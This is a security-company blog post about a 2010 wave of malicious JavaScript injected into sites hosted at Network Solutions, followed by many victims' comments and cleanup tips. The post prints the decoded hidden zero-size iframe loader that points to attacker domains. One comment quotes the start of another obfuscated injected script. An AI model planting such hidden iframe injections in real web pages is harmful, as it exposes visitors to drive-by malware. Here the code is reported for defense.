Network Solutions hacked again

Network Solutions is getting hacked again. Just today we were notified of more than 50 sites hacked with the following malware javascript:

If we decode this javascript, we see that it is injecting this iframe from http://corpadsinc.com/grep/ :

document.write (s) < iframe frameborder="0" onload=' if (!this.src){ this.src="http://corpadsinc.com/grep/"; this.height=0; this.width=0;} '

Note that this time we are seeing all kind of sites hacked. From WordPress, Joomla to just simple HTML sites.

UPDATE 1: Google is already blacklisting lots of them… Bad day to be a Network Solutions customer.

UPDATE 2: Some sites are also compromised with this encoded javascript:

Which injects an iframe from that http://mainnetsoll.com/grep/ domain (same from the attack of last week)

iframe frameborder=”0″ onload=’ if (!this.src){ this.src=”http://mainnetsoll.com/grep/”; this.height=0; this.width=0;} ‘

UPDATE 3: Some WordPress sites we were analyzing only had the malware inserted at the cache file from WP-Super-Cache. Everything else was clean.

UPDATE 4: Post from http://stopmalvertising.com explaining their finds on this issue.

UPDATE 5: Network solutions updated their blog apologizing to their clients and saying that they are working hard to fix it. Hopefully it will be solved soon.

As always, if you need help to recover from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • http://www.blogger.com/profile/02367812323043710058 Shashi Bellamkonda

    Hi David,

    We are aware of the issue – see advisory here http://bit.ly/aprfix. As always appreciate the support from the community .

    Regards,

    Shashi Bellamkonda
    @netsolcares on Twitter

  • Anonymous

    I've been hacked. Happened around 2:40 PM on my NS Shared.

    They are hitting WordPress index.php files.

  • Anonymous

    They've inserted coded script in the following.

    index.php
    wp-content/index.php
    wp-content/themes/index.php
    wp-content/plugins/index.php
    wp-admin/index.php

    4/18/2010 at 2:54 PM

  • http://www.video-music.info Dejan Švajner

    WP index.html deleted (640 permissions), ftp access changed.

  • http://www.epa.gov ElvisTie

    Indeed, sucks to be a Network Solutions customer now. All index.* files were hit and ftp password was changed.

  • Anonymous

    I can't log in with SFTP even with the new password.

  • Anonymous

    My ftp password didn't get changed, but all my index.* files have had code inserted into them. Vanilla html, no WordPress, etc.

  • Anonymous

    Update — a file named default.html also was affected on my site. Anybody have any other file names affected?

  • Anonymous

    So what are the steps at least for now to get our site back to normal?

    And what do we need to do to prevent this and similar hacks in the future?
    Do we need to make our permissions tighter, and if we do what files specifically without interfering with our server's and wordpress' communications and updates?

  • Anonymous

    man… this has been going on for weeks. The solution? Ditch Network Solutions… their security sucks and they are always getting hacked.

    -pissed developer.

  • Anonymous

    My NS site was hacked twice.
    It doesn't help that NS doesn't seem to promptly offer updated WP installs on their hosting.
    I'm not particularly savvy on updating WP as well as many other are not either. It would help if at least WP didn't serve up old outdated versions of WP

  • Anonymous

    It is not a WordPress problem. NS security was compromised. They also restored malware from backups in some cases.

    A fresh install is always good but wont work if the main security is compromised.

    Upgrading WP is usually easy since 2.7 something. However that doesnot touch wp-content folder in theme or uploads which are likely malware locations.

  • http://www.epa.gov ElvisTie

    Indeed, NS is hiding behind a veil of distrust and not respecting their customer base that was affected, me included. I have issued at least 6 service requests in the past two weeks only to get boiler plate emails that the issue has been resolved, when my questions were never answered.

    Vanilla html was affected this time, and FTP passwords were compromised. NS can't blame WordPress this time around, shame on NS for not taking responsibility for their own security. Now thousands of sites have lost revenue due to their security issues. Web servers were compromised across several sectors of their farm, and some how I think it may be an internal issue.

    With respect to WP upgrades, I upgrade my installations manually since NS does not keep the lasted version immediately available.
    1. Download the lasted WP update from the WP update site and unzip.
    2. Back up your entire blog folder to a remote location, then delete the wp-includes folder and all contents, wp-admin folder and all contents, and delete all files in the root of the blog directory with the exception of wp-config.php file. If you have any other manually edited files such as an .htaccess file you will want to save that one also.
    3. Copy the new WP version folders wp-admin, wp-include and all new files to the root directory except the wp-config.php file.
    4. Log into your blog and then check that all your plug-ins are updated and update those also. Then re-activate all your plug-ins.

    Hope that helps!
    Regards,
    ET
    3.

  • Anonymous

    My vanilla html site has now had malicious code inserted 6 times in the last 24 hours. Their tech support has nothing helpful to say. I have now pulled my site down altogether as I can't otherwise prevent my (largely un-tech-savvy) visitors from the threat posed by this code.

  • Anonymous

    I was hit as well. I'm running Joomla, and the index.php file was altered with the JS. Also, index files were created in subfolders, "images" for example, where they did not exist previously. I changed all ftp pws and it stopped.

  • Anonymous

    Another vanilla html site was hit. I removed the malicious code and waiting for the following attack i suppose. Some weeks ago our ftp passwords were also compromised. It is not the first time NS was attacked. And apparently all kind of sites are attacked. I will advice my clients to change provider. It seems to be the only real solution.

  • Anonymous

    I was Hacked too, and I just have a vanilla html site.

  • Anonymous

    We use Network Solutions as our hosting and email provider but unlike the rest of you, our website was unaffected. Our problem is that our email stopped working last friday and I am wondering if this had anything to do with the hack. It took me 15 phone calls for them to explain that we had violated their TOS agreement for spamming. It's funny that we don't advertise via email but through direct mail. So WITHOUT ANY NOTIFICATION, they shut down our pop serivces and have crippled our business. They also have not provided any proof to these accusations which makes me incredibly irate. We have been using Network Solutions for around 60 days now, and in 15 years of using our last provider, we have never experienced any issues whatsoever. We needed to switch because we needed a Windows platform. I also find out that we can send mail but cannot recieve it. I would think that due a spamming violation, the opposite would happen. Cannot send but can recieve. What do you guys think about this? I think it should be passed on to legal.

  • Anonymous

    I am new to NS I've been developing my new project for 75 days I haven't even officially deployed my site yet it's in "In Production Mode" when you go to my URL. I was affected by the breach-hacks.

    I thought NS would be a real safe and secure choice with all the big name sites and blogs using them and assumed they had top notch security for customers.

    Guess I misjudged that decision.

  • Anonymous

    This is the form email I received when I notified Network Solutions on 4/11 that I thought something fishy was going on with one of my sites: Thank you for contacting Network Solutions Customer Service Department. We are committed to creating the best Customer experience possible. One of the first ways we can demonstrate our commitment to this goal is to quickly and efficiently handle your recent request. We apologize for any inconvenience this may have caused you. Based on your concern, proponents of malware commonly look for websites with vulnerabilities. These include weak passwords, third party applications that are not up to date or sometimes weakness could emanate from lack of updated anti-virus software on PCs. A large part of preventing these events comes from users taking preventive steps such as: ? Routinely change passwords including FTP/ blog/content management software ? Update your blog/content management software to the latest version. ? Update any plug-ins or 3rd party scripts or code you may have for your website ? Update firewalls & anti-virus on your local PCs. ? Make sure your file permissions are set correctly correct and do not allow unauthorized access. This is not an exhaustive list and these incidents can happen for a number of reasons. Just cleaning it once is not enough to resolve this. You should always take precautions.

  • Anonymous

    Is NS even going to be able to repair themselves or is this a irreparable mess.

  • Anonymous

    What irritates me the most is the shield of secrecy that NS operates under. Why don't they come out and own the fact that they've been hacked. I host more than 15 sites on NS and have been with them for over 10 years. But have always found their service below par. They try to blame YOU for all their own shortcoming (as I read above in the 'email-not-working' case and the security 'advisory' mail sent to another helpless complainant).

    Hey, Shashi Bellamkonda… are you reading this? We're all eagerly awaiting your response on all this… Mr. netsolcares!!!

    Shit happens… at least be honest about it!

    Shame on NS!

  • Anonymous

    All my wordpress sites were hacked with the code that appears here:

    http://jsunpack.jeek.org/dec/go?report=b370ae651ac14878cd73222ec641390db995de8a

    wordpress/index.php files all had the code inserted – my joomla installation was untouched though.

    Each wordpress install is on a different db with different passwords…

  • http://www.blogger.com/profile/02179754956717252563 sdpate

    The last of my three sites NJN Network went down tonight. NetSol are not getting close to cleaning up their servers.

  • http://www.helponline.pro Dejan Švajner

    Today, again.
    Script in index file on my site http://www.helponline.pro
    04/22/10/ 09:21:00 CET+1

  • Anonymous

    web-search.com hacked again at 7:58am server time 4/22
    I took most stuff down for now.
    All cgi removed 2 weeks ago just in case.

    The worst part of all this is NS tried to tell me I had a problem with my content when I first told them about it 17 days ago.
    All the while knowing that many others had the same problem.
    I spend hours going through everything and kept getting hacked.
    If NS had been honest, I'd have saved countless hours trying to fix something I had no control over.
    Just a comment: Why is it when I do searches for hacks, there are references all over over the place to fileman.cgi which NS uses?

    Not a happy camper.
    Bob

  • Anonymous

    BTW Does anyone know how long it takes for pages that have been removed due to this hack, to be deleted from search results?

  • http://www.helponline.pro Dejan Švajner

    #Anonymus: in my case, Google responded within a few hours after my report in Webmaster tool.

  • B4Cier

    Hey Everybody, I have a straight up HTML site that kept having the index.html altered. I tried putting a redirect meta in the page code to prevent it from loading the malicious script, but a meta redirect still loads up to the body and the code is being inserted after the meta tags. My solution is to setup a 301 redirect (see: http://www.isitebuild.com/301-redirect.htm ) in .htaccess. That way the server never sends index.html to the requestor and replaces it with whatever page you put in the redirect page section of .htaccess. Hope this helps anyone. I'm super pissed @ NetSol, but pre-paid for 1 year hosting and can't back out now…

  • B4Cier

    It also works for crawlers… so search engines won't see the malicious code and knock you down the ratings board :)

  • Anonymous

    Network Solutions should make all this "right" somehow. This has not been funny for any of us.
    Over 2 weeks of this —so far——-

  • Anonymous

    My html web site has been hit too. It seems to be a new exploit they are using. It's some sort of PDF vulnerability.

    I called tech support and they said it could be 24 to 48 hours. My response was "why the hell have you not unplugged the server???" They are spreading virus all over the place while they attempt to fix it. Unplug the dam servers until the problem is fixed!!!

  • Anonymous

    Jumped ship myself…hosted a fair few sites over the years with a fair few hosts…but NetSol have proved to be by far the worst. This has really been the final straw with these guys.

  • Anonymous

    My sites attacked again during the night (early am 4/23)
    But now I'm unable to use ftp on ANY of my servers (3)
    Before it was just one effected.

    This is far from over.
    Oh btw, form letter from NS saying they found no bad code on the example I sent them.
    Is anyone even checking?

    Bob

  • Bob
  • Anonymous

    I caught the issue on my client's site. Unfortunately since we take very sensitive information from their customers I couldn't just change the code and be happy, so unfortunately I have been up all night (caught the issue at midnight and after 6 hours getting it all fixed, transferring all files, database, and DNS records over to a dedicated server), and I finally get to go to bed!

  • Anonymous

    This mess has been going on for almost a whole month now.

    Complete the equation.

  • Anonymous

    This seems like class action material

  • Anonymous

    Finally got back into my NS file manager today after waiting since Tues for them to fix things.

    My index files are hacked with script again.

  • Anonymous

    I don't know what to do. I'm two months into a NS shared hosting one year package. In production (a start up), not even public yet. I take security seriously, do scans daily, firewall, backups nightly, don't store info in my SFTP program, log in manually each time when I use SFTP, etc., etc. It's full time work. I am getting killed by these hacks.

  • Anonymous

    Still happening at 1430 CST. Had a new type of script inserted in a bait index.html page. This script starts out as "var gID=new Date();var kK=false;var dKA;var cNM;if(cNM!='xYN' && cNM != ''){cNM=nul"

  • Anonymous

    Still happening as of 1430 CST. Hit a bait index.html file. New script being used I think, it starts out as "Xvar gID=new Date();var kK=false;var dKA;var cNM;if(cNM!='xYN' && cNM != ''){cNM=nulX" but without the X's

  • Anonymous

    Still happening at 1430 CST . . .

    It's out of control obviously. What are we supposed to do? This is insane I didn't pay for this or deserve this.

    Steve

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    @Steve, what is your site name? I would like to try this…

    @Anonymous: Did the scanner pick it up?

  • Anonymous

    @Steve, what is your site name?

    I'm not public yet. I already scanned them today with the Sucuri scanner with production – maintenance mode disabled and they came up RED. I was hacked last Sunday, we restored the database Monday. I made backups of the restored sites. Everything looked clean. They are still clean locally. Finally was able to get back into NS file manager today. First think I noticed was a weird modify and I opened it up and it was hacked. Also on my SMF forum.

  • Anonymous

    Still paralyzed. Even a database restore from last Tues is messed up.

  • Bob

    Site seems ok now but interesting problem.
    I can log into file manager and manage account just fine but not using WS-FTP program on my computer. Passwords are fine as they are the same as file manager at NS.
    Any thoughts?
    Is NS blocking outside programs at this moment?

    Bob

  • Anonymous

    Has anyone had their site blacklisted by google?? i ran sucuri scanner and came up negative, changed password, and deleted old files in server. i then uploaded new clean files. what is the turn around time for google to de-blacklist you and get your site up again in search results?? this is killing us!!

  • Bob

    Using the Google tool it took me about 24 hours or less to get the black listing taken off. You do need to verify you own the site to get them to do anything. It's as simple as adding a google code to you index page.

    BTW This is funny as hell to me at least. This is the current message I get when logging into file manager right now.

    "This Connection is Untrusted

    You have asked Firefox to connect
    securely to http://www.networksolutions.com, but we can't confirm that your connection is secure.

    Normally, when you try to connect securely,
    sites will present trusted identification to prove that you are
    going to the right place. However, this site's identity can't be verified."

  • Bob

    Details of above:

    http://www.networksolutions.com uses an invalid security certificate.

    The certificate is not trusted because the issuer certificate has expired.
    The certificate will not be valid until 1/21/2009 7:00 PM.

    (Error code: sec_error_expired_issuer_certificate)

  • Bob

    Certificate is now fixed but still not able to get in using WS-FTP
    Have to use web based system at NS

    Bob

  • Bob

    Would someone from Sucuri contact them and find out if this is going to be fixed or is some new process now in place?
    I notice that to use file manager now there are now two layers to go through to get to files. Perhaps this is a solution they've decided to implement?

    Bob

  • http://www.blogger.com/profile/13404429802520793570 Tobin

    After searching through most of the night I found our problem at the bottom of counter.cgi in the cgi-bin directory. It was injecting the malware script into all php pages (not just wordpress) after the final HTML tag. Removed it and now we're coming up clean on the sucuri scanner.

    I'm not very happy with NS right now.

    Tobin

  • Anonymous

    I'm on shared hosting. I was hit last Sunday. And again yesterday. I'm wondering if poorly maintained blogs (or even abandoned) on this setup might be part of the problem. NS should check all shared hosting blogs with some kind of automated checking system and notify these owners that "we've noticed you haven't logged in to your account for 30 days.
    We have sent you important security notifications please check your in box." If these blogs are infected and launching these attacks, those of us who are on top of things pay the price.

    There should be some kind requirement that shared hosting blog owners have to maintain proper security with no exceptions. That's not to much to ask. If they can not they should get a free blog setup where they don't have to deal with maintenance.

  • Bob

    Anyone have any idea when the nearly constant resetting of passwords will end?
    Wouldn't be so bad but there is no notification it's going to happen. You only find out by logging in as admin when your ftp program fails

    Bob

  • Anonymous

    No clue Bob.

    I can't even set my proper file permissions and make them stick for my own installs either.

    Apparently the only winning move at this point is not to play.

  • Bob

    Aren't we all getting tired of these message:

    [10:17:37 AM] Bob Bradley: ALERT: An important message from Network Solutions Customer Service

    We are currently experiencing high call volumes and you may experience longer hold times. You may also experience delays in making modifications to your account or website or even making account level changes or updates. We are aware of these issues, and our Engineers are working diligently to resolve the matter.

  • Bob

    PS I tried using file manager to set permissions but like you, it isn't changing.
    WS-FTP works "some" of the time but you almost have to sit on it to get anywhere.
    Very unproductive to say the least.

    Don't even think about calling. lol

    Bob

  • Anonymous

    I am using WordPress Bob and they aren't being much help either.

    If your not part of the WordPress "Club" apparently we're on our own.

  • Anonymous

    Now I can't even upgrade and remove plugin's or change permissions via file manager.

  • Anonymous

    My html we site is still totally down. Also, there main web page at networksolutions.com was serving virus at 3:15pm pacific time on 4-26-10. It's fixed now. I wish they would fix my site so quickly.

  • http://www.blogger.com/profile/15332304198321210453 Maggie

    If you are interested in learning more about network management my client Cisco is hosting Cisco Live at The Mandalay Bay Resort in Las Vegas…June 27th – July 1st.

  • http://www.blogger.com/profile/12767319822228590527 St. Luke’s

    Our site has been hacked 3 times now in the last four weeks. I have changed every password at least three times (and some four). It happened again last night with a different php code than before. All FTP passwords were reset (I assume by Netsol) so they must know what is happening. No official word from anybody and I can't wait on hold until they answer.

  • Pingback: Modified Websites Pushing Trojans On the Rise « Webroot Threat Blog()

  • Pingback: Warning this Site May Harm Your Computer - Now What?()

  • Pingback: WordPress Hacked with Corpadsinc.com at Network Solutions()

  • Pingback: Network Solutions hosting compromised thousands of accounts | NJN Network()

  • Pingback: New infections today at Network Solutions | Sucuri Blog()

Network Solutions hacked again

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.